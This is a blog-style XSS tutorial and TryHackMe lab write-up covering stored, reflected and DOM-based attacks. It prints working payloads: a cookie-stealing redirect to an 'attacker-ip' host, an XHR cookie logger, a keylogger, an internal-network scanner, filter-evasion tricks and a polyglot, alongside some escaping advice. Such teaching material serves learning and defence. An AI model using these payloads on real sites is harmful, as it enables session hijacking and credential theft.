A guide to XSS

2021-06-29

This post covers quite a lot, but it's all practical! I hope you can use these skills whenever you come across a website that hasn't done the work to protect itself. All within the legal confines, of course...

XSS (cross-site scripting) is a plague that can hit a website from various points. It can be a problem with how resources and pages are mapped into URLs, for example https://my-website.com/admin/?account=document.cookie, where a value taken from the URL ends up in the page. If an attacker attaches a script to such a URL and sends it as a link to the rightful owner of an account, the script runs in the owner's browser and can install or perform all kinds of things, including capturing the session cookie so the attacker can log in as them.

It is something we have to watch for with every web form. The site needs to sanitise input correctly, otherwise an attacker could get the server to hand those scripts back to a browser that will execute them or, worse, the scripts are stored on the web server and handed out to every user... This can happen with the comment section of a website: you post a comment with a script embedded, either as a function which sends the document.cookie of each user who sees it to the attacker's IP address, or as a malicious hyperlink in the comment itself.

Ideally we would just ban JavaScript, but there are far too many uses for it, and nowadays there is good native support without the need to use TypeScript or other type-checkers.

We shall go over the simplest and most dangerous XSS attack first, which is the stored XSS attack. This often happens when a website allows user input that is not sanitised (special characters aren't removed, and characters that have meaning in HTML or JavaScript aren't escaped) when it is inserted into the database.

Usually such a script grabs the local document.cookie and issues a GET request to the attacker's IP. The request won't return anything meaningful, but the end result is that the attacker can hijack our session and ruin our lives... Every time someone visits that site, the "comment", "username" or whatever field the attacker used will be executed, and the user is served that content without even clicking on anything, as it has become as intrinsic to the website as the rest of the content.

I'll be using TryHackMe's XSS box as a teaching resource, and you can consider this part of the article to be a writeup - as we explore all the major topics - but with a few notes at the end.

Stored XSS Attacks

So, load up the box and you should see:

xss-homepage

Now I got super confused at this point, as I didn't read the "You need to login to continue" message; I just started trying to run scripts in the username fields... But yes, register an account first and we'll start the first challenge.

stored-xss-start

As I mentioned earlier, stored XSS is easiest on the more social platforms, where feeds, comments etc. need to be shown. Our first mission is to become familiar with injecting HTML into websites, and all we have to do is "exploit" the comment box to achieve this...

After trying <h1>It worked</h1> we see our code spring up:

stored-level-one

Now if we log out, or use another account, this feed is still shown, which is an implicit reminder that the server re-renders the feed along with any scripts we put in. Level two is quite simple too: all we need to do is run an alert() showing our document.cookie and we're there.

store-level-two

We'll see an alert pop up, of course, showing our cookie - but you'll also get the website's own alert("W3LL_D0N3_LVL2"). And you can bet that will never stop popping up every time the comments are loaded...

You might be thinking by this point: why on earth is the browser so stupid as to allow this sort of thing? Surely it knows that what has been inputted is JavaScript and not an ordinary string? Well, JavaScript is ubiquitous in a frontend, and HTML itself has elements like <a onmouseover="alert('this is mad')">Some text</a>, where the JS attaches itself to genuine HTML attributes. By the time a comment reaches the browser it is just more markup in the page, and the browser has no way of telling it apart from what the site's author wrote. So the real question is why the site sends it as HTML at all: if the characters are escaped, so that "<h1>No large text</h1>" is rendered as literal text, the site is much safer, because the browser displays a string instead of evaluating tags.
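To make the escaping idea concrete, here is a minimal sketch of what a site could do before putting a comment into the page. The escapeHtml helper is my own hypothetical name, not something from the TryHackMe box, and real applications would normally lean on their templating engine for this.

```javascript
// Hypothetical helper: escape the five characters that are significant in HTML
// so that user input is displayed as text instead of being parsed as markup.
function escapeHtml(text) {
  const replacements = {
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#39;",
  };
  return String(text).replace(/[&<>"']/g, (ch) => replacements[ch]);
}

const comment = "<h1>No large text</h1>";
console.log(escapeHtml(comment)); // &lt;h1&gt;No large text&lt;/h1&gt;
```

With the angle brackets and quotes turned into entities, the browser shows the comment exactly as typed and never builds an element or attribute out of it.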

Now let's mess around with the site, and we can run this script

<script>
var header = document.getElementById("thm-title");
header.innerHTML = "I am a hacker";
</script>

This will deface the site each time the comment section is loaded, but at least we see we're rewarded for the effort haha

stored-level-three

On the right hand side you'll see the answer displayed, but I wanted you to see that the scripts themselves are preserved, even if you don't see them.

Now then, onto the next task, which is to steal someone's cookie! There are a few sneaky ways of doing this using a client's document.cookie, but in this tutorial they forgive you for using the incredibly blunt

<script>window.location='http://attacker-ip/?cookie='+document.cookie</script>

Which will redirect a user to a blank page, and the attacker will see the cookie in the URL. In this learning playground, though, there is also a /logs page, which is quite nice, so we can post the cookie there. In the real world this may just be a POST request sent to an attacker's server, or the cookie could be appended to a field on the attacker's own account, so that it pops up under their profile name for example...

Here is the script I'm going to use to get any and all cookies:

<script>
let cookie = document.cookie;
var xhr = new XMLHttpRequest();
xhr.open("GET", "/log/" + cookie);
xhr.send();
</script>

And whenever Jack decides to log in and view the comments section that script shall execute. After I've pulled the cookie I can swap the value in at the cookies page like so in the browser:

cookie-stealing

And you can see here that we successfully sent a message as Jack...

Utilising a keylogger script alongside stored-XSS

JavaScript can be used for many things, including creating an event to listen for key presses.

<script type="text/javascript">
let l = ""; 
document.onkeypress = function (e) {
l += e.key; 
console.log(l);
}
</script>

Now let's take this script and add it as a comment and wreak some havoc! Remember, if we only log the output to the console, the keystrokes end up in the victim's own console, where we can't see them. For the sake of learning and not introducing too many hurdles, there is a /logs page that we can send our keylogged data to.

The reflected XSS attack

With this type of attack we need the user to be actively involved, clicking on a link whose query carries the script. The web server reflects that script back into the page, where the browser executes it, or the link may even pull in a more sophisticated script from a rogue server...

Oftentimes you will see link shorteners in use, which attackers can use to disguise spoofed websites. They could take someone to "Facebook", have them enter their credentials and, if we're good, redirect them to the actual Facebook with those same details, so they're logged in completely unaware of the MITM.

When inputs get executed through URLs, we don't always need client interaction: we can definitely get away with just putting the script within a field, and that field data gets pushed into the URL and reflected back by the web server for the browser to execute. Below is what happens when no sanitisation is done by the client or the server.

reflected-xss-one

And the second task is much the same, just crafting an alert that has window.location.host instead...
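As a rough sketch of why reflection works, imagine a handler that copies a query parameter straight into the page. The renderSearchPage function, the /search path and the q parameter are all hypothetical names I've made up for illustration; the box's real server code isn't shown anywhere.

```javascript
// Hypothetical server-side handler: builds a results page from the ?q= parameter.
function renderSearchPage(requestUrl) {
  const query = new URL(requestUrl).searchParams.get("q") || "";
  // Vulnerable: the decoded query is copied into the HTML without any escaping.
  return "<p>You searched for: " + query + "</p>";
}

// The link an attacker might send: the script travels inside the query string.
const payload = "<script>alert(window.location.host)</script>";
const link = "https://my-website.com/search?q=" + encodeURIComponent(payload);

console.log(renderSearchPage(link));
```

The page that comes back contains the script tag verbatim, so the victim's browser runs it as though the site itself had written it.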

The DOM-based XSS attack

This one is at times the best choice and the absolute worst. It has so much power in the sense that it utilises the website's own procedures, and since it always executes on our computer there is no chance of the server being able to step in and defend itself. We rely on vulnerable website functionality, a lack of care that allows us to inject scripts where they really shouldn't be. Remember when I was talking about stored XSS and how the server may choose to store things we give it? That can also be the case here: we can get around standard sanitisation tricks and, instead of uploading an image to our profile, upload a script for example.

That's sort of what we shall be doing here. Our first task is to see whether or not we can add some functionality to the <img> tag, maybe an onmouseover with some alerts? So whoever hovers over our profile would run a keylogger for the rest of their session? Brutal...

dom-level-one

On the right we can see the tag being constructed with our supplied URL added in the middle:

imgEl.innerHTML = '<img src="' + imgURL + '" alt="Image not found.." width=400>'

We can see that if we end the URL prematurely with something like https://somelink.com" (making sure to add that last double quote to close src=") then the rest of our input is free to add attributes. The template also appends its own double quote straight after imgURL, so when we add onmouseover=alert(document.cookie) we need to open a double quote of our own just after the = and leave it unclosed, because the template's quote will close it for us. Entering whatever" onmouseover="alert(document.cookie) as the URL means we effectively end up with this:

imgEl.innerHTML = '<img src="' + 'whatever" onmouseover="alert(document.cookie)' + '" alt="Image not found.." width=400>'

What's important to remember is that the input we enter is treated as a string, so whatever is never looked up as a variable. The double quote in the trailing '" alt=... piece was meant to close off our URL, but we're using it to close off our new attribute instead.

And that worked out! Try it, and we can check the console to see if the innerHTML of the img tag looks good:

correct-dom-level-one
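If the quote juggling is hard to follow, this small sketch reproduces the same string concatenation outside the browser so the result can be printed. buildImgHtml is a hypothetical wrapper of mine around the template the page shows, and the cat.png URL is made up.

```javascript
// Mirrors the concatenation used by the page: the URL is dropped between two
// fixed pieces of markup without any escaping.
function buildImgHtml(imgURL) {
  return '<img src="' + imgURL + '" alt="Image not found.." width=400>';
}

// A normal URL stays inside the src attribute.
const benign = buildImgHtml("https://somelink.com/cat.png");

// Our input closes src early and opens a new attribute that the template closes.
const injected = buildImgHtml('whatever" onmouseover="alert(document.cookie)');

console.log(benign);
console.log(injected);
```

Printing both makes it clear that the page's own closing quote ends up terminating our onmouseover attribute instead of the URL.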

Next up we need to do a similar trick, but when we hover over the img tag we need to change the background colour of the website to red.

Port scanning trickery

On the application layer your browser has no notion of internal and external IP addresses. So any website is able to tell your browser to request a resource from your internal network.

For example, a website could try to find if your router has a web interface at 192.168.0.1 by:

<img src="http://192.168.0.1/favicon.ico" onload="alert('Found')" onerror="alert('Not found')">

Please keep in mind this is a proof of concept and there are many factors that will affect results, such as response times, firewall rules, cross-origin policies and more. Our browsers can conduct a basic network scan and infer which IPs, hostnames and services exist. As this is a learning exercise, assume those factors do not apply here.

The following script will scan an internal network in the range 192.168.0.0 to 192.168.0.255

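<script>
// Probe every host in 192.168.0.0/24 for a favicon; a successful load implies a web server.
for (let i = 0; i < 256; i++) {
  let ip = '192.168.0.' + i;
  // On load, clear onerror and report the live IP by requesting /log/<ip> (the path must be quoted).
  let code = '<img src="http://' + ip + '/favicon.ico" onload="this.onerror=null; this.src=\'/log/' + ip + '\'">';
  document.body.innerHTML += code;
}
</script>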

After you've found a valid IP you can then use the same method above and include a port number. However, the method described here only works with web servers (as it's looking for the favicon image). A more detailed port scanner can be found here. As previously stated, this page is a proof of concept; you can create scripts which have much more capability.

Filter Evasion

For us to even be messing around with scripts and eval, we assume that the website is blacklisting particular keywords, or it may just be that the website hasn't even considered security. More often in the real world inputs are whitelisted, but you may still find functionality in the DOM, or in things like image upload, which hasn't been battle-hardened - hence we can do reverse shells, stored XSS etc.

For this section of the playground, for each level, we have to use the input field supplied to generate an alert("hello"), zipping past any defences.

Task one has a filter that removes all script tags, so we go for a DOM-based XSS: reflected and stored attacks involve server-side processing, but we're happy with just getting an alert done on our end. Going back to the DOM section, we know that we can attach an event handler to another tag, such as an onmouseover.

So it can literally be as simple as this:

<a onmouseover="alert('Hello')">This worked...</a>

Next, we have a filter which bans the use of alert. No matter, the real problem is we have too many options to choose from. We could just be childish and not even play the game by replacing alert in our last answer with either prompt or confirm, but that's boring. Another way of doing it would be to replace the letters of alert with their equivalent character codes and join them back up into the call we want. If eval isn't filtered, we can do it like so:

eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41))
// String.fromCharCode(...) returns the string "alert(1)"
// eval then runs that string, which alerts 1
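Working the character codes out by hand gets tedious, so here is a small sketch that goes both ways. toCharCodeExpression is a hypothetical helper name of my own; only String.fromCharCode and charCodeAt are built in.

```javascript
// Hypothetical helper: turn a payload string into a String.fromCharCode(...)
// expression, so the filtered keyword never appears literally in the input.
function toCharCodeExpression(payload) {
  const codes = Array.from(payload, (ch) => ch.charCodeAt(0));
  return "String.fromCharCode(" + codes.join(", ") + ")";
}

// Decoding the numbers from the example gives back the original call as text.
const decoded = String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41);

console.log(decoded); // alert(1)
console.log(toCharCodeExpression("alert(1)"));
```

Nothing is executed here; the string only runs once it is handed to eval, which is why this trick depends on eval itself not being filtered.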

Another way is to do simple encoding/decoding rules, transpositions etc.

Task three has a filter that stops us using the word hello, but my side note below gives us a clue as to how we can get round this.

Side note: this level is so easy that I accidentally inputted the answer from challenge one as a test - which I meant to replace with the String.fromCharCode stuff - and even though the filter altered the data, it still worked...

<a onmouseover="alert('Hello')">This worked</a>

The filter just removes the word and it still comes out good, but a better way would be to do

<a onmouseover="alert('HHelloello')">This worked</a>
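To see why the doubled-up word survives, here is a sketch of a single-pass removal next to a stricter version that repeats until nothing changes. Both functions are hypothetical stand-ins of mine and only assume the filter deletes the word hello regardless of case; the box's actual filter may differ.

```javascript
// Hypothetical filter: one pass that deletes every non-overlapping "hello".
function removeSinglePass(input) {
  return input.replace(/hello/gi, "");
}

// Hypothetical stricter filter: keep deleting until the text stops changing.
function removeUntilStable(input) {
  let previous;
  do {
    previous = input;
    input = removeSinglePass(input);
  } while (input !== previous);
  return input;
}

console.log(removeSinglePass("alert('HHelloello')")); // alert('Hello')
console.log(removeUntilStable("alert('HHelloello')")); // alert('')
```

The single pass cuts the inner Hello out, and the leftover H and ello close up into a fresh Hello that is never checked again.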

Even though the String.fromCharCode returns the right value, it doesn't seem to be rewarded, but if you look at the client-side validation then you can start to see why:

requirements

For question three, it just does a replacement, so if we include a Hello for it to remove, the fragments around it join up into another Hello that passes. For task four we can see that there is quite a lot being removed, but it looks at attributes, not the text itself, which is another easy thing to dodge, as it doesn't watch for things like ONMOUSEOVER etc.

<a ONMOUSEOVER="alert('HHelloello')">This worked</a>
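The uppercase trick works because HTML attribute names are case-insensitive while a plain string comparison is not. Below is a sketch of that mismatch; the BLOCKED list and both strip functions are hypothetical and only approximate what a blacklist like the one in task four might do.

```javascript
// Hypothetical blacklist of lowercase event-handler attribute names.
const BLOCKED = ["onmouseover", "onclick", "onload", "onerror"];

// Case-sensitive removal: only exact lowercase names are stripped.
function stripCaseSensitive(input) {
  return BLOCKED.reduce((text, name) => text.split(name).join(""), input);
}

// Case-insensitive variant for comparison: any capitalisation is stripped.
function stripCaseInsensitive(input) {
  return BLOCKED.reduce(
    (text, name) => text.replace(new RegExp(name, "gi"), ""),
    input
  );
}

console.log(stripCaseSensitive('<a onmouseover="x">')); // <a ="x">
console.log(stripCaseSensitive('<a ONMOUSEOVER="x">')); // <a ONMOUSEOVER="x">
console.log(stripCaseInsensitive('<a ONMOUSEOVER="x">')); // <a ="x">
```

Even the case-insensitive version is still a blacklist, so it would miss any handler that isn't on the list.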

Protection Methods and other exploits

Assuming that the website is operating on a blacklist gives us a lot of freedom, and whatever it takes to bypass controls we shall do. Polyglots are payloads which test whether alerts etc. pop up across multiple injection contexts at once. An example polyglot:

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

There are also entire frameworks which try their best to break the client, the BeEF framework being the most notable.